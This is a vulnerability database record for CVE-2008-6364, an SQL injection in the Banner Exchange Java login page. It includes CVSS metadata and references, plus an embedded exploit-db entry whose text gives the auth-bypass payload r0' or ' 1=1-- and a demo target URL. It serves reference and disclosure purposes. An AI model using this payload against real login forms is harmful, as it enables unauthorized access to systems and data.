ID CVE-2008-6364
Type cve
Reporter cve@mitre.org
Modified 2017-09-29T01:33:00
Description
SQL injection vulnerability in logon_process.jsp in Ad Server Solutions Banner Exchange Solution Java allows remote attackers to execute arbitrary SQL commands via the (1) username (uname parameter) and (2) password (pass parameter). NOTE: some of these details are obtained from third party information.
{"id": "CVE-2008-6364", "bulletinFamily": "NVD", "title": "CVE-2008-6364", "description": "SQL injection vulnerability in logon_process.jsp in Ad Server Solutions Banner Exchange Solution Java allows remote attackers to execute arbitrary SQL commands via the (1) username (uname parameter) and (2) password (pass parameter). NOTE: some of these details are obtained from third party information.", "published": "2009-03-02T16:30:00", "modified": "2017-09-29T01:33:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6364", "reporter": "cve@mitre.org", "references": ["http://packetstorm.linuxsecurity.com/0812-exploits/bej-sql.txt", "http://www.securityfocus.com/bid/32781", "https://www.exploit-db.com/exploits/7425", "http://secunia.com/advisories/33072", "https://exchange.xforce.ibmcloud.com/vulnerabilities/47281"], "cvelist": ["CVE-2008-6364"], "type": "cve", "lastseen": "2020-10-03T11:51:05", "edition": 3, "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:7425"]}], "modified": "2020-10-03T11:51:05", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2020-10-03T11:51:05", "rev": 2}, "vulnersScore": 7.4}, "cpe": ["cpe:/a:adserversolutions:banner_exchange_software:-"], "affectedSoftware": [{"cpeName": "adserversolutions:banner_exchange_software", "name": "adserversolutions banner exchange software", "operator": "eq", "version": "-"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:adserversolutions:banner_exchange_software:-:java:*:*:*:*:*:*"], "cwe": ["CWE-89"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:adserversolutions:banner_exchange_software:-:java:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}}
{"exploitdb": [{"lastseen": "2016-02-01T02:11:35", "description": "Banner Exchange Java (Auth Bypass) SQL Injection Vulnerability. CVE-2008-6364. Webapps exploit for asp platform", "published": "2008-12-11T00:00:00", "type": "exploitdb", "title": "Banner Exchange Java Auth Bypass SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-6364"], "modified": "2008-12-11T00:00:00", "id": "EDB-ID:7425", "href": "https://www.exploit-db.com/exploits/7425/", "sourceData": "[\u00e2\u02dc\u00a2] \u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2{\u00d8\u00a8\u00d8\u00b3\u00d9\u2026 \u00d8\u00a7\u00d9\u201e\u00d9\u201e\u00d9\u2021 \u00d8\u00a7\u00d9\u201e\u00d8\u00b1\u00d8\u00ad\u00d9\u2026\u00d9\u2020 \u00d8\u00a7\u00d9\u201e\u00d8\u00b1\u00d8\u00ad\u00d9\u0160\u00d9\u2026}\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\n\n [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability\n \n [~]Vendor: www.adserversolutions.com\n \n [~]Software: Banner Exchange Java \n \n [~]author: ((\u00d1\u008f3d D3v!L))\n \n [~] Date: 28.11.2008\n \n [~] Home: www.ahacker.biz\n \n [~] contact: N/A\n\n[~]\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0{R0}\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\n \n [~] Exploit:\n \n [~] username: r0' or ' 1=1--\n [~] password: r0' or ' 1=1--\n \n \n [\u00e2\u02dc\u00a0]login 4 d3m0:\n \n www.adservingsolutions.com/xchange_java/logon_license.jsp\n \n [~]-----------------------------{str0ke}---------------------------------------------------\n \n [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker & K374 & /\\/\\4/\\/0/\\/\n [~]\n [~] spechial thanks : dolly & 7am3m & EL z0hery & BLACK R053 &{str0ke}\n [~]\n [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller\n [~]\n [~] xp10.biz & ahacker.biz\n [~]\n \n [~]--------------------------------------------------------------------------------\n\n# milw0rm.com [2008-12-11]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/7425/"}]}